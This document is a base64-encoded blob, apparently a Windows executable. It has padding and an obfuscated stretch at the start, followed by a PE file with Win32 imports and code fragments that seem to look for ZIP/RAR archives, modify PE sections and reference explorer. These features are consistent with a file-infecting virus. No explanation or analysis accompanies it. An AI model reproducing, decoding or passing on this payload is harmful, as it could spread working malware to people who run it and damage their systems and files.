+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7
+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7
+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7
+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7
+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7
+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7
+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7
+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7
+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7
+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7
+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7
+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7
+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7
+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7
+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7
+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7
+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7
+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7
+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7
+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7
+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7
+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7
+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7
+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7
+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7
+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7
+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7
+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7
+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7
+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7
+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7
+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7
+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7
+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7
+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7
+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7
+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7
+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7
+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7
+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7
+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7
+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7
+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7
+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7
+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7
+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7
+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7
+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7
+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7
+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7
+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7
+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+1g+/twNjdztLfmfbT2tzD7ObC3tHbyt
zT4/bZytrvy97bytPj+u7z09GV1NDfvMLfv52PnOrz5v/K3Y+Bl83M37+/v7+/v7+/v7+/v7
+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7
+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7
+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7
+/v7+/v7+/v7+/v7+/v7+/v7+/st/Hj7Ga18rfsZzM3c+xn8bZ37Gd3tvPv7+/v7+/v7+/v7
+/sZvHy8+xl9vC37GX28LT37GYzt3fsZ7cz8+xm9Dc37Gdy8nfsZfD3M+xld/I37Gc38/PsZ
zfsZ/O3M+xkt/I37GS38rY37Gd3tTfsZLfzI+xn8vZ37+84NnbyM7dytPi9tzdwNzA2dvD6O
bR29DYzMPs+s3NytHbyerdzMbQ0dPvvv/Pz5/u28fcz73qwd+96sHQ8dza37zmzMvK0tPs+s
3NytHbzPDR283A09zq28Ps6t3Jxtza3M+84NnbyM7dytPi9tzdwNzA2dvD6O798+ju/fuD6O
7d35n209rfkf7S2t+96sHc6t3Jxtza3M+28dvK3cHa28+c6tvLxtHY3MPs/tzX2tPv7tvH3M
+/v7+/v7+/t/bTn7f609PQ05+96tWPufjFj7rh29rT1tnK3c7d09rfkt7W09KSnZqczZ+96t
vKzcHa29+S3tbT0pKdmpzNn7+/v7++35qcz5qcz5je0trfvt+anM+anM+bwNDT377fmpzPmp
zPmMrd3Mbbyt++35qcz5qcz5/O28zX37qcz53K0tDZztPfm8DQ09zPv7+/v7+/v7Ha2M+52s
HR1s+x1tza37fawtDazc+618zW28rfuNDQ29+/wNjJ2sPfuObR1+/vtvr/mYGfj7jsjYGa89
Ta3cHfn7jsjYGU89rVwZr/v7fQ2M+e3crflsDaz7Pa28icz53a35ndxtrR29zPu97dw9bR2N
+8wN+c0NDT357fmdPe3MfTmtHV0NbPltvPtsDazc+fztzMyMDdy9+30NHa1s+8wNLa357Kyt
zLxtDR3M+/w9re3Mrfm83Gz57Y3tbR37jK09zQ0trfm8DfktbPl9DS2tvA2MHfu8fa35j+3c
va0d+Q2d+a+9rR37bR283A29rM28bQ0d+Q0d+e+/zj/7La2tvG0djfkdDbxtza377KytzLxt
DR0d7W3crfvNDR2N3O28rD3tvG0NHcz7zA3M6ftd7fztHa3MrfmNbdw9+Z7O+fw97WzdDWz7
PQ0NTTktbPndre2svG2drD35jW3cPfmd3G2tHb37re2Nrdz5vA35zK2t+WwNrPvM/G3NrfmN
bdw9zIn5nA3N7T35zQ0dza3cvPtd7fztHa3Mrfk97czMifnMrXxs+fxtzbys3K3M+/v7+85s
Le0dvK3N+y/N7Z2trfufKc6tzazcrfvODfx9Dcz7vtytHb0tbc3cDftP7cz8rdzMTWz7+/v7
n9wNLVj5+74NWPn7zqzdXa3NvFj5+/v7vn2t+Z0NPT0NjG0djfkt7W09+c3tHYm8+d2t+cyt
Hbz5vA35qcxY+759rfntvLztzX0trR28+759rfmdbT2t+/ltzPm8fa35DdxtjW0d7T35Le1t
Pfv5jW2crflsDaz5vH2t+anM+/ltzPnt+anM+b3tHY2t3A2szPmcbdyszPm8fe28+anM+83t
HfltHZ2tzbz5DR35jm0daHgJL60J2Pj4+Al+/hn7zPzcre29+bx93A2sjX35rS3tbT0Z+5yt
3Gz5+8z8rc1t7T35+328vPxYCQn7jIyMGfsZzQ0t+58N3PktDdyt+W0dnQ3cLe28bQ0dOfw9
re3MrfmcbcxtvPn7vn1tzPltzPn7b/mpzPlsDaz5jA2sPb35qcz5bbwZ+60dXQ1s+z1tTa37
jG3Mfft9Dfyt+618/K3NvPv7z33cbcy8Le3M+x+tjPlsre3c+87tbR28+Z7tPa0dvG0drYnM
+b/tbPvvPT197T09DYwt7cz77/zcbT35nw0NPcyJ+b/tbPs/7b1s+b/tbPvvzMysLfy8bQ0d
+8/tHb09rS3tzPvvPT35zg2sPcyJv+1s+6/8bfx97R1s+/v7+/t/7fz8bPn7f+2crfnt+fv7
ON3cGCtb+ytb+/wNzLwt7cy8rdz7+/uObR1N+/tvLe2Nrf7tvH37L28vrymerdzMbQ0dWPno
GfgrW88NHbytHbwpvmz8rVj5Law9vG387dy8Ce09vK3cHe28bZytSCtba90NrB297dxsKPvP
DR28rR28Kb5s/K1Y+bytfLwJfbwtPUgrW88NHbytHbwpvtztHcydrdwprx3NDb1tHY1Y+eys
DbytvSn83G0dvO3dPa0rWytbOH++Lz8YOH+v778YOAl/r++/GDjfD79uGKnMK1s4nw8fvhj7
+zgJnw8fvhg4Cd8Pv24YOAl/vi8/GPv7+88NHbytHbwpvmz8rVj5qcxIK1trHe0trSipzCtb
zw0dvK0dvCm+3O0dzJ2t3CmvHc0NvW0djVj53e3MrZi4K1vPDR28rR28KW+/WPk4qcwY+/v7
+/v7+/v7++2svW0NCXwpjO2c++2svW0NCXwpLW29bfvt/Pw9bc3tvG0NHQkNzbytvCnMvNyt
7S37+/v7+/v7+/srWzhtndztLa35zNzNKMi/zW29WKnM+X2tbY19vCjIv/j5jG29vH0oyL/4
GCtbOAltndztLa0Y+759bcz5je0trfltzPktbPmdbdzMvPmMDdxNGTjd3BgrW24NrIncrfm8
fa35nW3czLz5/D3tbK3cGfsPb8/u+/7cDY3c7S2fbT2tzL9t3Pv7+/vMLbz8GfsO757+yNj7
Du+e/s/P+x8Pv8jY+x/+zs6ez/sf3q/O7sjY+x/Oz3+vv8jY+x/Oz3+vvx+++x/O/j+uj28f
+x/vnvsf757v/s6ez/sf757v/o7I2Psf754/rsjY+x/vnt6uH977H++ejsjY+w7vnv4v++8/
r96+zp7P++8vDx/7757+yNj7757+z8/7757+L/sfyNjOz+8fjvsf756OH7777x++b55v3vvv
nv6u/r/7756Pz77eP/vvno5vH2io+87P7x/I2Puezn+Obx/I2PufKc6+D/6O+58p/t4Pvmio
++/PT45vH8jY+56vvr7e7277nq++aKj7zo6vr/5oqPv+z8+Obx9oePtvDy8PH2h4+++e/r7P
+++er8jY+++ezw8fzg8/+5/+KY5vH/u/nv5oqPufKe+PH75oqPvPP++OaKj7H57PaKj7zs/v
H/ueb96uzvs/D89Pvw+OH9j4+Pj7Hw3cvA0d+y/N7Z2trfvvHbxtnG3c+77vzk8vj977+/v7
+/v7+/v7+/v7+/v7+/v77x++bymeb94Zv++++89/Tz9vzr4Zv++++89/Tz9vzr4ZL877z39P
P2/OvhnP/s77z39PP2/Ovhm+7577b57fGR++XvvOL+/evs9/TxkvzvvOL+/evs9/TxnP/s77
756P7r4Zv++++++Pru/evxm/7777+/v7+/v7zn09jO38bRm9PT37T63cHa09yNgZvT09+x2t
vO38bcjYGb09PfvMnc0ZvT09+/v7+/vObdzN7S37H20tve37zw29rd6tvfuO7k8vL8h4iHj7
j95vr5/IeIh4+5+sHfk/DZxtHY35z9xtLW0d7T37Hw3cvA0d+y/N7Z2trfvvHbxtnG3c+++c
zQ0dzA09+58pzr4P/o77nynOrc2s3K37zg38fQ3M+5xt3KzM+++e/vkvDR1tvA3c+++e/vmu
/L3tvK3M+28dDc2sPe28rW+++/7PKc1tPT1tHfvObC3tHbytzfu+3K0dvfkvbc3cDfufKf7e
D777+R8Pv8jY+fv7+96tjW3MvK3czq3cnG3Nrf7cDc2tzMz7H628zn3t3K3vvb37zn+/rT2t
vK1PrWzv+86dzW/Mn209rf7cDbytzbytvfsfrbzOfe3crY+tvG8dnQ37H6287/xt36ydna3c
n9ytrfv7+/v7r37+Pw/er977zy8vj977LcxtLR37bc2MzQ0dHfuMbR1cbfz7+/v7+/7cDY3c
7S37qcz5OKnMGPvv38+/r5+Pf29fTz8vHw/+7t7Ovq6ejn5uXu3dzb2tnY19bV1NPS0dDfzs
3My8rJyMfGxc+OjYyLiomIh4aEkJ+8ytvKz8+20dzLztPT37va0tDfvMHQ0N/Gz7/G3N7c2s
+01tvLxs+/w97Wz73A3NTfv7+/v7+/v73u3c6VqL+wfyzPv7K/v7+/v7+/v7+xnc7dz7+4xt
HW0drbwZvT09+28dvK3cHa28j628zw0dHa3NvK29zrztvK37+/u/bdytzbwN3Gz7vT09ze3N
fa37+86tv63drI3+3G2cbT2tja37zq2+zd3+3G2cbT2tja37+/v7+/v7+/uM3Sld7fztHRnN
DRld/PucrdxtXA0dGR2tvPvt3OysbdytvRmtzPu9bZ3tzRnNDS37+84NnbyM7dytPi9tzdwN
zA2dvD5vHbyt3B2tvPnvzc0NrB28+S/tHe2Nrdw+783NDawdvMw++84vvv75zq3cnK3c+84v
vv75ry3tbT3577293K3MzPv7jg3cLflPPa1cGa/5bS0trB1tvGz7+089rVwZr/ltzPm8fa35
LQ3MvPnNDS0tDR35jA3cPb0pjG29rfnM/Nyt7b1tHY35jA3cLRlvvInM+Zyt3Gz5ve0dja3c
DazM+d1s+c0N3Nys/LxtHY35bA2s3PmdbT2tzBk43dwYK1vfrc3trMyt+Q2d+W28zPmcrdxs
+cwt7dy8+cy8re09vH357R29+e0dvG0p7R28bSmcbdyszPm8rc19HW3NOS0NzLz5zQ0tLQ0d
+e+e+cwNnbyM7dyt+c3tHYm8+b2tvK3NvPkN3PnNPa3tHfltvBk43dwYK1uOrfm9rZytPQ38
rb35vH1tzPmd3K2t+W0tLawdbbxs+bwNDT35vA35va2dre28+bx9rfkt7T1tzW0NrMz5nG3c
rMwZON3cGCtbbg2s+Q0dPWz5Ha2tvfm8DfncrB35vH1tzPm8DQ09+Q0dza057R29+bx9rR35
Tz2tXPmMbT09+R2tnK3c+c0NLa35bR28DflsDazc+f7PGTjd3BgrWx8Pvq9Y+d+tze2szK35
vH1tzPm8DQ09+e3NvMz57cz57fmd7U2t+U89rVz5vA35nQ0NPfm8fa353K3tPfmMDdwtOcwN
La357575LQ0dbbwN3Pkt7WzdrfnN3Gz5jH2tHflsDaz53Kwd+W28GTjd3BgrW2+d+cwNOW+N
HQ3crfm8fa35jO3cHW0djTntHb35zK09rc28+YnNDR28bR2srYkZON3cGCtbb535bA2s+X3t
nK357R1s+eysrcy8bQ0dOfw9re3Mrfk47fl93K2dKMi/Le1tPbwNWKnMGC3tbT35vA35La04
Ce0YGfv7+/v7+/v7K1uObR3I2PlPPa1c+Z7YGfjo+Zn5jm0dyNj5nw3cDax8+Z7oGfgrW88N
/GzcbY19vPnY+PjYOS3tva35bR3578xt7Stb790NrLz5Tz2tXPme2Bn46FgrW2voOS/tbR35
LW3MzG0NHfltzPm8DfncrT2t7cyt+bx9rfkdrYz53e3dbPn+r/mcbdyszDmObR3I2PmfDdwN
rHwrW2vYOR8N+cxtjR1tnW3N7R28+c197R2NrRkfDfndrI35nW18rb0ZHw357R1s+fztbD0N
7b0ZK1vv3Q2svPmObR3I2PmfDdwNrHz5efw9XPlNra38+bx9rfkd7S2tObx97R18aStba+g5
n6w9PfnNDS387bxt3T2t+Y5tHcjY+f6v+Zxt3KzM+Q0d+Y5tHWh+CdhPCR++CX7+K1tr2DmO
bbx9+Zyt3Gz5bR28rdytzLxtHY35na3tvKzcrRnPfa3NTfltvOkrW2vIOR8N+e0dbPn87Ww9
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
